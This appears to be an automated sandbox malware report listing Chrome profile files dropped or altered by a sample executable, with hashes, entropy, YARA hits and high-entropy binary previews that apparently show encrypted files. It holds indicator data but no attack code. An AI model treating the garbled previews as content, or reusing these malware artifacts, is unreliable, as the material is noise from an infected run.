SSDEEP:	24:fMP4lMa/aGDwQICGYbh1itpB94UjdO1FyMwmxFPzraYvgiZA+fPGTubD:fMP4lMaHwBCGYN1itf94UwSM5fra5+3L
MD5:	4156FBCC4BDB8D6001CE129E1BF41F45
SHA1:	8FF17B23BAD87C5BF1323AAC0641231C99BB0F7F
SHA-256:	B17068A064677D4E916490BAA6CD8ED01177F3BC3AF4121D8C5D326DEC11D3FB
SHA-512:	705C1EF3F753DDA49D4A2E23CCCBF8DB721980ED39F8594D63D143C755E4646C756525246376EAFE9B5CD3DC5531B259E6C15D8979C3B5566BA01529572DCA94
Malicious:	false
Preview:	<!DOC......5W9i.v.5.G..../..w&5!......P..Y...9e.`...........vl.3.[PzW..I..v.4..\|.68DoNU$...r.pr.Qz.f.=.....t...;...Y..kV.vK@......&.&......[...k`.UBT...y.q...G.)..D........'e's..[.0.sO!...i&F...x.. ..?o'.$gJ.x..K#.(0oR.SR&.Ji5..V..&.C...'Fg....B.......B!.....u\..iYF8>.!i.;......a..R..g./;...i+..O...n8.XE.T)..rE3..f.Z..K. 8.+...h.....G..p#P:...Yd.h...M^.....k\|.lt....RBH..q9...I.i...X.g3&7.....~..]%w7. .v..d#&?lU.u.....^b..P...B.7...c....m.$xh.vu.8k...rv..W.....pq9.N....O.C...\|vi.....o..0..}.....mE....>.@..C...m..5....%f;...@.'W..IK.JeZ.R.......v.......F..p.A.%.L..........-H...P2(...E*S.m....1H...:.K.0.W.$.Z..k.%.@....).A\|.:a.....bz.l[5.X..T.......$.....r..}4#.ut........-..0.....B.`...E.Y.iL..$..ou..c.o.......?..../P.'...,t.3;.(...+.].0-~.h..jx<4....._.j....2.>.b5bb..G3..U.h...z......N.A-!..#.4F.....V..........M~wQ_A.F6..(.8.......A..9c.+<.....%3_.Mo........5.m..s.&.x.0\...n.2.!......A8._^.., "..cxG3...lw.....).m.......]l..q....`XZ?.5

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\flapper.gif

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	GIF image data 6044 x 14818
Category:	dropped
Size (bytes):	70698
Entropy (8bit):	7.997219341190102
Encrypted:	true
SSDEEP:	1536:XlPH99Brar/W9RBCrR/EQfr3mjrYvl/tKJLK:XlPH99Ba7iCrfr3mjrwllV
MD5:	7077BE1F1D4EDD26CD87CBC060619775
SHA1:	72411E2E4EAB51177ACAEE7D893C18FB375E35CE
SHA-256:	925133B4B1FED2077BC96D18C16F9A83DC9998BEA0BAA3CFD334623B2B3C7831
SHA-512:	EFD09946F4D5099AC19324181047EC1EF5966E4237C3D613AFB2351EE79AA214638C99B500E16BC1B2F9BFB8CEF83812BB1F0CC07941A71152E0238E6F816DD8
Malicious:	true
Yara Hits:	Rule: SUSP_GIF_Anomalies, Description: Detects files with GIF headers and format anomalies - which means that this image could be an obfuscated file of a different type, Source: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\flapper.gif, Author: Florian Roth Rule: SUSP_GIF_Anomalies, Description: Detects files with GIF headers and format anomalies - which means that this image could be an obfuscated file of a different type, Source: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\flapper.gif, Author: Florian Roth
Preview:	GIF89....9N.z....go..j.'.=.4.6^..d....w.....c.a..H....!.,...rbs....na...3:.i..6..P.O..._....j..eJ}.\.B..f..y..T4$...5".Vw........b.0.....q.s..7]......H:.......ms.@...ie(8.....<?_.......W.xp..u#g.)b..s........]B....."6.D.......Y........YP'r.LZj.....P.X.JZ5.u\|..:3.$.....l..:a{.X....T.o.H.4.......s.Y..>/..:..4\|.;M.$wK..E}T...G.(..r.B.lE..&.Yh..T..W.}.,I=u..%f1...$b .r.PSr.& :..zs.D/...=....H.......:y..N>.&.t....EA..J.....~{.F(.-S..+o.bk^..x.@...u._.f..a.&.E.K.....O7.h..`R.I..$fWJ$b....1/..5./.rEC...j.,.Z.#rO....s..C..c......Y`........f...a.m5...d.V.P.`.r...#ldG...\|.k..yO...D.....o.H..i!-C..qz...t....0F2m.H...K.h....}..FY5....sa.......l..33.+Te.G.x.+tm.........w...}...GQ...0..* &...p?.u...fW.9Y..>........"..;...}.......2..~..J......9G.....=.X..tt.b.C.C/..-..)..v....6b...r6.....pI*...q.Q..........3...[.m.7kG../'z,Z..\|.u....b].......q.....6....Z......V#M%O...K4.E......`gi...[.^.h-...0R..>..+.../>.Ve8za...W.^.....s....6.=....]U$g6

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\icon_128.png

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	4698
Entropy (8bit):	7.966727909149362
Encrypted:	false
SSDEEP:	96:T26hmF488ywaha/33EtZeMIwB1nVlhJu1pLI4TSEDcQee2CYkZhbEJ:i6A288yxha/30lWpLIkXDcQ9TU
MD5:	681A1A6107959ABC285771F8A4BD0AD8
SHA1:	636B31B18539D9E0F0AA0F726900756D688F5A80
SHA-256:	2A602C20FD9BBB99B178AD34BEE427CCE051165696DD1A0611AEE13DF06B765F
SHA-512:	593CAD49BE0BF4FFD5CBAC5407A5AFC0393967123A18E987D2CB46B13CF63E67C4AA538573F85BA62301782330B71565E0B8A5AD7FE1363F613316A4E1F7DE59
Malicious:	false
Preview:	.PNG.. .._.i.Q.N..].uH`0.{...?...8.9..M++.%%.....Fc..#z)..9m$.[f.J.+.q........a.Z\.}.f\..a.q ."...vs.......A..R!...-.`.[z.X...w..B.F..>..e[....:x.....\|,....bz&n5..z.4qiyM.}..?....\|.v...v.....+#..;.."..a.R._s..Y.qFtt.PJi#...lcK.A\.~....)f.L........-.C.-..)3[...p ..q......wh...........Q1....lU..%.I.oE.m<B>........."=,.2.^...H.B.k.....%JD....b.3.h..)....q.-j..9^..k...R.(..$.D?..Q.......`.V'fA6::...p...2......t..kq/.}.j.......L.AZ;..L.;.>..h....Z..b.i.r.r_.Y.r06...Jw......eN.....6>]t..>..z.*uM....5JZ....1. S<.z@W......zG...t.......b...4mb`...0qY...w....=N3....L.f.:....,.D......\...V...K.0..^\....n#k..l..k.....C....r....U.....G..3..l.(....O.m...K....N..l<B....m.......wU..:.W.3,...l.K.C.o....3..fT..%.@9E..:...p..?..-..tD..8<...5..&..S.........Q.....3.d.v&....ag.-,.a...x8.(....QW=......2q.,r......n......<.HW.[..0..Z^tZ.....RJ.`{.].y.V....._.........~...........F7./V...S...5..."...9....A.#.T.:l...?..?..U..N.0....C1.d....v.....:..

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\icon_16.png

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	892
Entropy (8bit):	7.750400889144331
Encrypted:	false
SSDEEP:	12:5NQyT2N/MF5B3uz2DgxcQwGj8Oqe4KZ3Z9VL/htY4zC0jGufym91sXtcii9a:5NQySMzBLDgxzwVA/hJ7KuP94bD
MD5:	FCCA21383E32AE882613E311BF9847D2
SHA1:	E4FAE2494B03AC4E0B62542E0D147A2DE123E016
SHA-256:	38B66CBA03F6BBFA2D003381ACF1FFB32B26AE3C93CD9BB237A3FB6D582D7C64
SHA-512:	B49CD7D420C8D2DD14EEC773BC9316551F1CA915566D0CF19CAE2C6F62B1A5CC3C8484457EDBDE664A2DA6FDD3F60EB492CE3FA28CDA1AE7BD723054F5011471
Malicious:	false
Preview:	.PNG....3......gBT3Y../.....3.Y..@k&W...M;6L\|!.@........1>..9...v..i.=.Q.....:.x).:g.u..b.w.nS.n.%nR`..+..\T..2Z..".....XL#5.I.......v.ZN@....-8.0S.e...ls/.o.....>c.D...I.. d...H.8E.H._(."..!..\.u.._.3#.V...Q.....p..J.Ko.iu9..]......C.g.2...ZW.g\|.(I.O...\./...j..:e...N............%......D{..+....."..j.D......$..6....0........b.....%MD..=..?+We...-B0'...i....L.....D..b1...J.G.Z.....74`o..\..7....[...pRD3..}.....{..n......{7R&.).:..}!...]....Sc..Q)0...I...8eK.....~....%.%..kX........+..d...k.o..0..h..[....#....2f......f....t..;.j...s`....r..E2.of...N..qF..RA....I..Z..}.&.3...^..q<.8...H....."....Q..v..Y......0.'...&M...F8j......R8\|t..f.......v7a#........4.q..L.t.UvO.dS......GIK..]..z..{2J6YI..ifA...j..u>...B.......1.l...Iyg....\_..2.d...$.F.k.?.a...K6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\topbar_floating_button.png

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	494
Entropy (8bit):	7.556076015557796
Encrypted:	false
SSDEEP:	12:hXluR6V8mqe+RdlChOCJ9GtwqcSg6Ytcii9a:hVuRT2J6YhbD
MD5:	ADA95D12C2E30664EB78D28E4290896B
SHA1:	B9071BFD7618B5675EE2132E44229FA28EF79080
SHA-256:	D1BF4FBBAC5EACBD62FB24D586CA94244CBC9F55FBF34A95319F7EC6F4BAE646
SHA-512:	A5B7BDF2AECCAEDF0BE9C2872B4A0ED3CDF0AC458C9F08FCA8BCC95D23AD6A9B7F05C347BACE92CD2187EB5C7B0A5715C7942192D535CD914C349F701907B382
Malicious:	false
Preview:	.PNG..>....kZ.c...D}.....d%...u.....d_.h-.>....k..KKf...9J....d.....{...C.,2u....2..&r...Z..3i.jw].......^..g..y4*..2....V..:e......fm...m..Y...D.?/K.I.RoY.%..P{..a....p..]...d..d.6._!.x{......zC@R..:...!.D.Y......\|..1..x ..5-S.oq~.... m.@K.!f...:.c.....~R....z..........xI?.{Jv..3.t.ph........".(J..N....2. ....A2.8.b..9F.\|h.=....c@&V..R.....n..`g.=3(N6.u.}.4.n....4.C...;"..A.........sA..^K6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\topbar_floating_button_close.png

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	586
Entropy (8bit):	7.623566174270631
Encrypted:	false
SSDEEP:	12:QcPhnPIO43AKrS9WS662qkaAZ3dCW174NTNc5hlInmYtcii9a:H5wO0AZWSVrk3ZNH8PUn5ubD
MD5:	379D1160E5E7C08E10E5419E6A7B9ED9
SHA1:	EA4546380F25CE9A35E15C893D9C1F42D47D0869
SHA-256:	59B52EBF64ED9D14D12F2B7B6F7B53557BEDC3EAB23441B11675D305E5E2C4F6
SHA-512:	65ACC3C74650AC157839E6E436163735F470D92FCA76833622D45B34DAEC1B37F7B88AC16B71A746A63C8A12DCD943911956F9A9958FE36474257831B6750CAD
Malicious:	false
Preview:	.PNG.Y.{.A..7..O.XO.:..@%a..3.......V)...c.....H..................}.........".....i.=.3.QT.L..j.xL...a..;.......1%..!.h_{.p.......5..K...e..gO;`.B....IMeF...L-^G.sU.LT+s".o/5...f$....Z.q.W....Xw..x.O...e.5..\|...-.0P...VM......L5.f5.\|...h....9..:k`ce."wt.............!l.t\|$HE.q.~...?.9..4....F.8.)R. .u.._D....X....jRp....;. )..s.+...F,)....lZ........&.j.dY.j.F.b..5.....S.~5@g..+.P..(..O......Js..........4..y.U.Y).c]..B..G......g#..0.2$x....HR.i.L..%;...F-.)'...{.......X.+j%..#..y.5K6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\topbar_floating_button_hover.png

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	494
Entropy (8bit):	7.569284839241023
Encrypted:	false
SSDEEP:	12:53W9wQdUiVQkcE5VqoNpAEbknVKGACsh5ZtpQ/5WA7tcii9a:5D7rkceAE8VZmtpwRbD
MD5:	E32E584CB5FF0681CDC7951DDBA2156A
SHA1:	85BEBFAA853EC03D8815AC6BC2C88AE87F6641CE
SHA-256:	11FCD2C3D0E855F5C193A7328FA9401787EAD66A9ACF73FDFA2BFC03C6DF3EF8
SHA-512:	0DDE4BBDC04B1229411D8C9363027FCB536282E49F5C7A2343075DEAEEC2A0F5A6AA8CA0AB7B0ADB61D06B56CA393CD610692BC48AE441350169BDDB2252582F
Malicious:	false
Preview:	.PNG.J#. l...&.6.E......m...J.M{l.^.e....:...4....4R.@y......?-......<..I^.I_.n....i[...\.W.....C..\|.2t...so...t:....]....2..2.D#....U.5%...../..a....YZ..u7=.Vlx.*..{.s...L.(.Q..........8.\|..C........L....yz;(......6..'y.J}.sH..r..LC..R..(+...5..Q=.......C.~..c...@.&\7..b...x.S.KnS.s.J..jt..}....u<.n.3.U.9.s.fN].N..;....p.\|4X...j"5oNTnj}..{.....{.Wb)...=..<.O...M.S......,.F....+.,..<..K6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\topbar_floating_button_maximize.png

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	500
Entropy (8bit):	7.500044316862127
Encrypted:	false
SSDEEP:	12:pMDlDw+xhWt6AjLzl476bon0fVgNLM+ffktcii9a:+xAoaHlju0fVWnibD
MD5:	C046DD7596063A2836D7BF21F97BC81A
SHA1:	0E0754ECF63490BABC08813566C2958B317306D7
SHA-256:	01E83C07D457785BFB45B7D2FF692A52CE2DE49D4ABAF901A200EF834994C083
SHA-512:	BEBCFC615034989D84D19C199BF30567A2F567871CA2321CDF86BF574CE036EBF575156FA4DF419379433C18FD4142C0D5D13B79221B06A90F9BD886743D051E
Malicious:	false
Preview:	.PNG.ed.?....r.jQ..@;..mR....i...ZCB.$...\3.+.#.J...6.E.Z=....uw...J..r.V..6Y.....z.....u../.Nk...K.t...m......I.('.;d....U...2........H.G..z.&..P..!.r..D..(J..P..m.9....n....S..A.3..7L.CR..*.=...lm..g..W.CD...i.J.,.x$.j.}.@........Y.....Q...G6...tA.vz..../T.....}.....!.Q....W.....c...C.4Ow.,......G...\|...[.z.8.p.....;..B&uq.9K0...B.n.q......Cgf`7.P..Y.........0.gQ.Y........YWK.G....94.R9..K6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\topbar_floating_button_pressed.png

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	494
Entropy (8bit):	7.532809623869233
Encrypted:	false
SSDEEP:	12:Fcj7s0Nn01viJ2BT7rP/Xfy4C06sOl3Fyu1Bg6Utcii9a:Jo016J2BbKFBr351Bg6abD
MD5:	138B24E077811A0BE5742A422F8111B2
SHA1:	05819D745D39C5C2784533F87F889F5872A08DCC
SHA-256:	EBC22F7B6527961A4D562C1E519D92066DC68EF76FAB697F2BF1D62640018D50
SHA-512:	8131AAFBF70524F043A8734594E170DE8D782F404DC6DB93C06528397A2C8C3B6F55A76F81D8B1457034629C8294A6A5640A3E3B5AA235CFB66570E586682913
Malicious:	false
Preview:	.PNG...:.A......b...Z..[....$...%./.Wln.0nu.y....K..A.....hh...c..g.d...HQ...{.....@..i.^a.'6._U.=..9w..6.>..jG....b...1.{......v(BT.W...A..9.q:F.%E...R.m....].w&....2.E.rx-..?=...v..W[i...r.......k.. .+5...G.....m...f.j...5S1.!..&.Ev..1..u..'./.-l.,....uSm...u......=ie.#qo{..J.....Vt...3......#....\.z2.xxm.....}...C..`....0r9.]..(.yL..............'`....^.,.qE5...\|.b...!.=..B.%.I.z{R...i..f.. .*.K6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\manifest.json

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1656
Entropy (8bit):	7.879357612605069
Encrypted:	false
SSDEEP:	48:9iqZ1tGILufNOJWmSrxRRjH1q2wl1hyGD:9N1tGIL0OMRNHUnMe
MD5:	FE30824C53235CF8F59708C63A2FA9CF
SHA1:	BC8C2F726E78115EB3F06531778E96E47275505E
SHA-256:	1B4B668FAB37B8D7E2416F5EF7DD49B6009D07FC66F9F7F93609CBAB1C356C52
SHA-512:	F7D36C48D3695AF8B36EBCADE0158603E3C0DAAD05F7D44B6DB099F37F508BE8638CAA1FAD3530F24F52D8A1CC4136006A731429D221F070E222C16AF6DC1765
Malicious:	false
Preview:	{.. .Uy`.....C..Y...'..4..[.P..........{....Dy....8..F.N...>....K...}..........;gA.........`.{.W...&..m\|S..,.<t...gg....I...w^.`..S.xt...$\....D.<..!...........2.k.Bg....M.v..e...xf..)!...\|.E.D.-..=.2w.)..H.:..."TG...C0.[..D).bE.\|..........w...W...c.6..s....%U.I......U.W..6.....l%.!..e..\|........l.../.....[1=..)Q.[.Y..C.%r..%...Vk2.h....v.1.=.[M.R...U.o.....~....)..@..."."Z...LFjp{.....z.N...?~vg7D...J......GL.(J....3.KSF-A.o.S..q...7@h.<.O...u.CC.1"X.....Y9t.....uy.....j.J...>k.\."{....EqF3...<..V.f.E.LW..]4...........YVC...Q....M%.T.*Y.C....4{..(.MRc.S.5e.q."..........P...1..p.....a...~4..V...T..J./-.#.P...a.@j...y....z,.7/..\|CG.oO...L...O....1.93...Tx.q....b6]m...@cN....g..E.f...}v.......NE.....;Q.C!..\H....:D.>.8..D8.)..f.8G;...GD.....9......a`.;,...<.<.N.r"..h.B.3..T=X..Ye.yn\|...MI..8...+...../.9..2w]...s...fM..7....3.!...:.g.i_.. !."..e...C..#....^....Pw.tv.. [.-&$q....u\c$...Y....1..;.vO..&.T.h.B#.......EX\....8..M#..

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\000003.log

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	790
Entropy (8bit):	7.721692403108043
Encrypted:	false
SSDEEP:	12:YQrzZhQVGWyVRq8MwfY+7lNeH8yUhm6LbbxweWbcrPlOrifsevZG96m6eRtcii9a:BiVXyhVFMSbUAhSKkllbD
MD5:	45F40B35269E9DE090071F2A810910E2
SHA1:	99193D534E46A2DA9CD0513FEF0449BF25D02274
SHA-256:	9DF72869D0C9CEB7928BE950CDB85C357ECC4796F746F57B4A8A8614702B87B5
SHA-512:	AC0BFEF0B844053AEC688D976A875FD29B09F0050E55D7069F19CFA36D0CF19E3B313E091568809B12F8F670453EC4402A618A9B68D4340092AB75EDE9F53D83
Malicious:	false
Preview:	....0.....J.].F.V.A...3N......k-.....y..mBj-=...v1N.u...@t...0al?.X......=..]...[.P:....on..X..t.......-^.+..m.....-.I.U.0......B.....a..(0(B<.\....5.:.I.y%.A../S..T.,....O. ...B.&h.g^..K.&./..".#....?..{F.Y.%......Ts....t8.q.v.2wx9.m....<.........V......_......z.:...O.{.q....s..}Z..S.P.XH.@P.G.x.R.y.l.@...ezy..?..........SE.....L.]r........=.4..h9/..ob..Pa...}...Fd4..".....".Y.$..J..@..U.V`.....f........~m..........o,.]j..K=..mCr.;b9.Y.`W,.5E3.....".(.......;...P.v)7..h..."......z.o......z.t.r!QxdV.OA.P.s..n.T.....z...8.<..j....C.qj...c.......X.].a.UE.o....Y...K]...0\|D....jX_I...P[.T...l...M..*Q.9.#B..B2&j..uo.....g......D.,.n.........:.OPZ/=;.....M-g....gS%K.K6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption\LOG.old

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	479
Entropy (8bit):	7.49435643814914
Encrypted:	false
SSDEEP:	12:ZAoHvPIrYNcfWqNrKzLByHZIxNWMCR7KShYtcii9a:ZRHvPI4FqAzLBFDWM27ZubD
MD5:	886655B844028B4AD845EEF0FAAAFE49
SHA1:	B29E72B3E92491624D86EC4686A6AC18DCC12E44
SHA-256:	DE156EFDB056536AB8463E3B4A8A87BC83B51E166727EB6CBAE7703ECAABAADD
SHA-512:	5FB14B4AC7CD03627904844DF3EAB54AAF9FD584DC88E0B1994A36E20295EB30A83A53922978212D197A4CF355432D2BC07D8269A0888321E0903DF712E0925A
Malicious:	false
Preview:	2020/...Gi/`..~.......^..nN.@]...I....!....k....]..zl.P....I>...]m4..nA..Y=V}p.mgl......R?..U..aM..T}.?]..K..t...3..b 6."....i.......&.....Q.<.../...9>.k.i8...pa.....r..m9..(...H~...F..&C..w.>7..j.-...e..?GO.._.G...[.H.*M..;.\.w..[.{Wx0...}..(..d.S.K..pb.....%-.c6._.e.DlO...f..i...P..Q.y.F..Sv..j.9,F}-?].m.......\..jzuYkG...a~L#.w.q.f_...1.......R.U..Y..%.kg.p.......U./l..K6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Google Profile.ico

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	192624
Entropy (8bit):	7.998719632140624
Encrypted:	true
SSDEEP:	3072:csoxBSmDJl5qfzXcmQMpa9XhtR1U04LO6cDtpcAQp2AhM:cscB7/IfzsmQQqxt3U0I1p2Ay
MD5:	95F322EBF9F052D7180FB8BCE1ECD7FC
SHA1:	B920FDFB929E2F42DC059EC9265C754ADD6F4844
SHA-256:	B67FE7F481975352A1BC5D176E810103DE70B65EE2F06A3BCCC777DE2EA73308
SHA-512:	D727B73FB07226B7AE490A050C0F3DBC719DB611F36F9A31546B450414C7571FBBE7A88D3F8E20B9A3A7C1FAF86B978A818E5C2535C68F473DF536A063AAE016
Malicious:	true
Preview:	......;...V....Ea%...%.......\..B2Nt...n.Oz."R.).0.^.>...........n..,..yGh!../..28..6.W........-...=.J.....2.A...i.J.?5.....xJ..:...&.sL.t....H.K<9...M(vK0u.8.......8...k.<....\.>.V.q..sx.f...b~I.8Wi.........p.fh'.l).........r.(..AZ......w.......d.z. K.mI?c.fK.~y..."..hB.~.l7...lS......c]....q........ys:f.W....[l.u&..3...z.s.v."..d.yV...J......t.v%.mE.-..U..}.~#\|..0...../(1...m...z..9.~M...r.......B)v...<..%.a...j........3i..n...<H...0..".JWv;.9...-T.....y].".n.....Z.}..p%.l(._t..j/..'.@.....kY...D-..u.S..#.)b.Kn..y..S.\|.....^..8.......h....V...L..4.s.j.q.....t..5.a._...........'t<(.....E-.@......e~...<.S...dyuB.,...).S..\2...#...[.=.5. .P.\|.<.5#.....E.Iq0C.....zc..^.L..8..@!.}...u.^........V...f..5z.o......A.a.?p.3`1.A./(EmL.:..B.....&.+E....d....3.C.F...[.@......U../.B.\@...Y..x.3`.....58....`....n:...B}.dyw.H..........F+%...e..u\|.....=.s."..A.../x86.0..&.H....t..X]*t...~.y..O..<.J....+....,..npZ..@....i.>G...,..vI..Q.-.8.Ni.7.

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhi\000003.log

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	383
Entropy (8bit):	7.367298346834235
Encrypted:	false
SSDEEP:	6:w4+Tp4PNsepMgxjAvIaQMapLFqRHEiwIeQCA4LCbuMu93yTIF+/AbGxntHcii96Z:XKDgxAxapL85Eibe4bs9g2lUtcii9a
MD5:	A83705C98AA5A768702B4B5D2725DC52
SHA1:	EB8C1831BB1F86318EAD3516119C5EF7E108B803
SHA-256:	8F34B684AEC8BB2414E5AE551B6568F1D130A0CFB48096EB37803C8B3C8CC6CC
SHA-512:	A936DAEEC13A291EEE5F02BBA138EA64EF11392AAA992C357BC518D457F0B2C15395EA44C332CA6C1B52D90DD1615859C1A9EBEF666DFA48F9F5D6C5313A2820
Malicious:	false
Preview:	.X.%*..+z...W....Y.....].J.(.F....E1...'].5_....HKmju.%...O..\...V.Q.RR.7...@...}.Bv.?s.W.....q..z-..g..`c....g..X$S.......E.W..j.s{C.V9..(.. I&&..J.Y.i.U.T..f.^.....<Y.N.;..bh.q....r.6...g-..r$..3:.2MJ.....&...].Y....m.KM.Y#....#.....Uj.M@.G.%..}..8.,...Q...pJ.XH.ru$.A1.o7;..L.....V...1.P.\K6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	6043
Entropy (8bit):	7.967638543256387
Encrypted:	false
SSDEEP:	96:WXJo1jPeUEfncstvj/1utpU+dqzRekhLqvy8B0tC+Eiphr:WXu1jNE0stvj9eUBeOqvBB0U+xpN
MD5:	315A900159D15247A821FFB092262040
SHA1:	7FB1436E13B2C615C8655A11D0CF6FE60356208A
SHA-256:	B66971E77F00C5892EA5EA78714073641D3709345BC80D6207C4731832E5B129
SHA-512:	C9E9D6F3390048CA39EF0AA5FDB56E05F6584CD9D904341EAEC8464479EF0ECF7A6C2DCF87692D9F4E2BC9CC4C54486AD4E8AC2CEB5ED80AADD66B282BCB6546
Malicious:	false
Preview:	.d......l......w.W.-..uzC....8..$.j..2:..).Ih}oi..R.d.d.{..t.9.T<'....DT..Ih.d.,.=.\.B....<..&....#.O%:.vF=a.>.'...}..ho...Q..T....."..R]W%..Izw.x.0...(nsUR>....u..z.5..F..3....L..D.Z..s....3r\.#..U"".3'c_...PkF.j...#.Z$...\&y.w..p.+....3.:..Y.&y;..a...s.Y...Q;.]"RK...h6..vR5........T.......w..H.A...S.i.0..0W.1.U...?.....>I..........\.L.[.E==.nV....x..Fm...O.B.B....@D..'..\.......r.W4...`..k.N....p.#...O.....D1O..I.~.N.D..."..>..\ ..<.@m.;>O...9(..5/...7...7T.p..y..I....F!J..2......X/.Lf\|.k..?.....H.s.Q.......'..m.].....>.3.[i..d.i[.m+..6...6..:.b\..I}!yS....Ys.....i.@.l..8.[....U...5aWY6....m...Z`c...o.....U...h....?..2..L6N...8.....!L4p..?_....5<.)...3:'...i.+q..Hv.!...9.......\|ig.($. U~..x{.w..{...J..n.st.i.>...D....U...\.Z&,..?...".v'.L..Hk:.w. 2j').G0L.\|.......ReL...0.......T..H.r.....R.:......^.nhr{.S....qV.rw.%.............TP.S.)A.#........%I@.22y_J.6..Zj....~...Q[..Js?.gS..s.;..t.'..(C....k..f%..<.y....e..D.9 ,....

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\LOG.old

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	668
Entropy (8bit):	7.670059090967736
Encrypted:	false
SSDEEP:	12:tzjNIYLLPQu8kxyUnCqttUBy8eoXPOgAC/QCwzoCKT0Medtcii9a:5jiuHxHnxieMzpFe/bD
MD5:	787D387633F69DF21E1FF8672CB91F82
SHA1:	09CF4A6A2D9D74AF2928CFC6B91E16324E2A98CF
SHA-256:	E58806AAD055CA35E5AA247BD40D10A7BA1FF752AB28E936D0A94AD59A86A9B2
SHA-512:	3D09EF0157A1EFCC4751EE4EF4ED214DC4458BE6C93688745A2434E0B446B3D57CE07600C46DB43B3F7C2D33C242E78168ECA63DFDD4F737CC1ADF56B879D52D
Malicious:	false
Preview:	2020/~E...3...s#...#.......k.f.....{.....GV=:...V.uV.w..E.s.....QN..rw..........v.U._.T~U~.Rs..M3.....c.Q8.h1...~.2..?.I..K.....?....k....u.P..2#<..e.......^.k.......>.:=.fd.G.).j.n.1.....;..H.@k>'......g...$......u)6......w#..0. ...x.H(.}.. ..dy.N{. +W{0..x.....;{..q....].6.'..8..rh_...e....T.......zjA.e....1..B....r.%....3\|.)...r.....]>..-...[...#.......P.7N...PO..\......n..z.. ..@).q:....V._]...b}.G....>.....%...%..hF.Jz............."...4O.v.....?..Q...z..o..K_.......BV....m+.N/.(74...t ....V..?O...4....$......A.o.n.....ZG..^....>..'.o...Y..m......Y..z...K6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

